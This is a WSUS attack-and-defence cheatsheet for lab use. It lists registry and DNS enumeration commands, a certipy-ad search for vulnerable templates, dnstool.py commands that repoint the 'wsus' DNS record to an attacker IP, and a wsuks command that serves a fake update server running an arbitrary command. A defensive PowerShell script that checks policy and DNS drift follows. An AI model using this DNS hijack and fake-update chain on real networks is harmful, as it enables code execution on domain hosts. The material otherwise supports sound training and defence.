2026-04-20 • wsus

WSUS - Cheatsheet

Lab-ready WSUS enumeration, fake-server workflow checkpoints, and defensive verification commands.

WSUS Cheatsheet (Authorized Lab Use)

Use this only in authorized environments (HTB, personal AD lab, sanctioned assessment).

1) Quick WSUS endpoint discovery

PowerShell (host side)

Get-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate" |
  Select-Object WUServer, WUStatusServer, TargetGroup

Get-ItemProperty -Path "HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" |
  Select-Object UseWUServer, AUOptions, ScheduledInstallDay, ScheduledInstallTime

CMD

reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate
reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU

2) DNS and name-resolution validation

nslookup wsus.example.local <DC_IP>
dig +short wsus.example.local @<DC_IP>

Check whether the WSUS record is missing, stale, or modifiable by principals that should not be able to change it.

3) ADCS / certificate pre-checks (lab)

certipy-ad find -u <user> -p '<pass>' -dc-ip <DC_IP> -enabled -vulnerable

Goal: identify whether certificate policy can be abused to impersonate WSUS TLS identity in a chained scenario.

4) ADIDNS record management (lab)

python3 dnstool.py -u '<domain>\\<user>' -p '<pass>' \
  --dc-ip <DC_IP> --dns-ip <DC_IP> \
  -r wsus -a query <DC_HOST>
python3 dnstool.py -u '<domain>\\<user>' -p '<pass>' \
  --dc-ip <DC_IP> --dns-ip <DC_IP> \
  -r wsus -a add -d <ATTACKER_IP> <DC_HOST>

5) Fake WSUS workflow checkpoint (lab)

Example workflow often seen in training labs:

  1. validate client WSUS policy,
  2. validate DNS resolution path,
  3. ensure TLS trust preconditions are met,
  4. run controlled fake WSUS service,
  5. trigger update cycle from test host,
  6. collect telemetry/evidence.

Example command style:

sudo wsuks --serve-only -t <TARGET_IP> \
  --WSUS-Port 8531 \
  --tls-cert <combined_pem> \
  -c '<lab_command>' \
  -I <interface>

Trigger cycle on host:

schtasks /Run /TN "<update_task_name>"

6) Useful WSUS admin command

Export/import metadata between WSUS servers:

wsusutil.exe export export.xml.gz export.log
wsusutil.exe import export.xml.gz import.log

7) Defensive quick checks

Group membership / privilege review

Get-ADGroupMember -Identity "Remote Management Users"
Get-ADUser <user> -Properties MemberOf | Select-Object -ExpandProperty MemberOf

DNS monitoring focus

  • alert on creation/modification of critical WSUS-related records,
  • baseline expected WSUS A/CNAME records and detect drift.

Certificate hygiene focus

  • review enabled templates and enrollment scope,
  • block broad enrollment where subject/SAN control is weak.
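As an added defensive check (not code from the original cheatsheet), this PowerShell script combines the policy keys from section 1 with the DNS drift bullet above: it flags a missing or non-HTTPS WUServer policy and compares the WSUS name's A/CNAME answers against a baseline. The baseline FQDN and address are constructed placeholders.

```powershell
# Added example (not from the original cheatsheet): verify a host's WSUS client
# policy and detect drift of the WSUS name's DNS answers against a baseline.
# The $Baseline values are constructed placeholders; replace them with your own.
$Baseline = @{
    Fqdn = 'wsus.example.local'   # constructed WSUS FQDN, as in section 2
    Ips  = @('10.0.0.25')         # constructed expected A-record answers
}

function Get-WsusPolicyFindings {
    $findings = @()
    $wu = Get-ItemProperty 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate' -ErrorAction SilentlyContinue
    $au = Get-ItemProperty 'HKLM:\Software\Policies\Microsoft\Windows\WindowsUpdate\AU' -ErrorAction SilentlyContinue
    if (-not $wu -or -not $wu.WUServer) { return @('No WUServer policy; client talks to Microsoft Update directly') }
    if ($au.UseWUServer -ne 1) { $findings += 'UseWUServer is not 1, so the WUServer policy is not in effect' }
    foreach ($name in 'WUServer', 'WUStatusServer') {
        $url = [string]$wu.$name
        $uri = $null
        if (-not [Uri]::TryCreate($url, [UriKind]::Absolute, [ref]$uri)) {
            $findings += "$name is empty or malformed: '$url'"; continue
        }
        # Plain HTTP lets whoever controls the WSUS name impersonate the server; HTTPS with a trusted cert is the mitigation.
        if ($uri.Scheme -ne 'https') { $findings += "$name uses $($uri.Scheme), not https: $url" }
        if ($uri.Host -ne $Baseline.Fqdn) { $findings += "$name host '$($uri.Host)' differs from baseline '$($Baseline.Fqdn)'" }
    }
    return $findings
}

function Get-WsusDnsDrift {
    param([string]$Fqdn = $Baseline.Fqdn, [string[]]$ExpectedIps = $Baseline.Ips)
    $answers = Resolve-DnsName -Name $Fqdn -Type A -ErrorAction SilentlyContinue
    if (-not $answers) { return @("$Fqdn does not resolve: record missing or stale") }
    $drift = @()
    $ips = @()
    foreach ($r in $answers) {
        # A CNAME in the chain means a second record (its target) must also be baselined and protected.
        if ($r.Type -eq 'CNAME') { $drift += "$Fqdn is a CNAME to $($r.NameHost)" }
        if ($r.Type -eq 'A')     { $ips += $r.IPAddress }
    }
    foreach ($ip in $ips)         { if ($ip -notin $ExpectedIps) { $drift += "unexpected A record $ip for $Fqdn" } }
    foreach ($ip in $ExpectedIps) { if ($ip -notin $ips)         { $drift += "baseline address $ip no longer returned for $Fqdn" } }
    return $drift
}

$all = @(Get-WsusPolicyFindings) + @(Get-WsusDnsDrift)
if ($all.Count -eq 0) { 'WSUS policy and DNS match baseline' } else { $all | ForEach-Object { "FINDING: $_" } }
```

Run it from a scheduled task or your monitoring agent on a few representative clients; any FINDING line maps directly to the drift, policy, or TLS conditions the troubleshooting notes below describe.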

8) Troubleshooting notes

  • If fake WSUS flow fails early: verify DNS resolution from target first.
  • If TLS handshake fails: validate cert CN/SAN and full trust chain.
  • If update trigger appears silent: check policy keys and task names on target.
  • If telemetry is missing: confirm logging/audit policy is active on DC and target.